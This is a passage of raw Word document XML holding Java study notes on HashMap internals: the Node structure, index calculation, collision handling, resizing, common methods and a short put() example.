          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>K</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V</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&g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mplement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Map</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Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>K</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V</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&g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5F4BD1F2" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194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3193476"/>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final</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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC20C40" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194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3193476"/>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final</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> K key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015CDD34" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194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3193476"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    V </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629EC15F" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194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3193476"/>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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>K</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V</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&g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nex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linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD06FE4" w14:textId="1826E166" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194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3193476"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF7DCCA" w14:textId="77777777" w:rsidR="00A92E95" w:rsidRPr="00CE4B95" w:rsidRDefault="00A92E95" w:rsidP="00E37BA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2140B6" w14:textId="36D9D5C7" w:rsidR="00FE789E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE789E" w:rsidP="00FE789E">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ashing and Index Calculation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BC5C36" w14:textId="77777777" w:rsidR="00FE789E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE789E" w:rsidP="00FE789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call map.put(key, value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341223FC" w14:textId="77777777" w:rsidR="00FE789E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE789E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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hCode() is called on the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F3EB84" w14:textId="77777777" w:rsidR="00FE789E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE789E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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hash value is calculated (with some bit manipulation for better distribution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD9D952" w14:textId="64176E6B" w:rsidR="00FE789E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE789E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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n index is computed as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01BE3E" w14:textId="65DE5A49" w:rsidR="00FE789E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE78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9559964"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">index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n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1</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amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// where n is array length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A16C5F" w14:textId="77777777" w:rsidR="00FE789E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE789E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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try is stored in the bucket at that index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BF201" w14:textId="77777777" w:rsidR="00B50B7A" w:rsidRPr="00CE4B95" w:rsidRDefault="00B50B7A" w:rsidP="00B50B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C01A619" w14:textId="2AF0CCDC" w:rsidR="00D33622" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33622" w:rsidP="00B50B7A">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llision Handling</w:t>
      </w:r>
      <w:r w:rsidR="00EF376A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564DC8E0" w14:textId="77777777" w:rsidR="00D33622" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33622" w:rsidP="00B50B7A">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collision occurs when two keys hash to the same index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705B48CA" w14:textId="77777777" w:rsidR="00B50B7A" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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 7: uses Linked List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46433A04" w14:textId="277FE405" w:rsidR="00D33622" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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 8+: uses Linked List → Tree (Red-Black Tree) if the list size &gt; 8 and bucket size &gt; 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C157CE7" w14:textId="77777777" w:rsidR="00D33622" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33622" w:rsidP="00B50B7A">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case of collision:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F469B4B" w14:textId="77777777" w:rsidR="00B50B7A" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>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ew node is appended to the list/tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73010C37" w14:textId="6E4BDC12" w:rsidR="00D33622" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>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uring retrieval, equals() is used to find the right key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005864E7" w14:textId="77777777" w:rsidR="00A92E95" w:rsidRPr="00CE4B95" w:rsidRDefault="00A92E95" w:rsidP="00E37BA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689501D1" w14:textId="77777777" w:rsidR="00351A5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00351A5D" w:rsidP="00351A5D">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Rehashing (Resizing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252DEAE8" w14:textId="77777777" w:rsidR="00351A5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00351A5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>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size &gt; capacity * load factor (default 16 * 0.75 = 12), HashMap resizes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17116EA5" w14:textId="77777777" w:rsidR="00351A5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00351A5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>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ew array is double in size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABE8A3C" w14:textId="55A431A5" w:rsidR="00351A5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00351A5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>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l existing entries are rehashed and moved to new buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E7D3B" w14:textId="1959B1E0" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187" w:rsidP="00072187">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mon Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1627084B" w14:textId="2109A688" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187" w:rsidP="00072187">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Basic Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7275E023" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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t(K key, V value): Associates the specified value with the specified key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F249614" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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et(Object key): Returns the value to which the specified key is mapped</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299E3E61" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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move(Object key): Removes the mapping for the specified key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CBE329" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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tainsKey(Object key): Returns true if this map contains a mapping for the key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D66027" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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tainsValue(Object value): Returns true if this map maps one or more keys to the value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2933A437" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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ze(): Returns the number of key-value mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2FA8F9" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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sEmpty(): Returns true if this map contains no key-value mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68722DE0" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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ear(): Removes all mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56C6E8" w14:textId="0A46862D" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187" w:rsidP="00072187">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Bulk Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F19BEFF" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>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tAll(Map&lt;? extends K, ? extends V&gt; m): Copies all mappings from the specified map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C11B45" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>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keySet(): Returns a Set view of the keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60400FB7" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>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alues(): Returns a Collection view of the values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7BDAB" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>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trySet(): Returns a Set view of the mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D34B3" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187" w:rsidP="00A556DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B38C7E" w14:textId="7CE1378E" w:rsidR="00E37BA4" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556DC" w:rsidP="00A556DC">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17DF8B12" w14:textId="77777777" w:rsidR="00A556DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556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380087"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integer</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ring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> map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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E6FC77" w14:textId="77777777" w:rsidR="00A556DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556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380087"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</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ut</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397053A6" w14:textId="77777777" w:rsidR="00A556DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556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380087"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</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ut</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"B"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2545C8DE" w14:textId="77777777" w:rsidR="00A556DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556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380087"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</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ut</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"C"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0137C405" w14:textId="77777777" w:rsidR="00A556DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556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380087"/>
        <w:rPr>
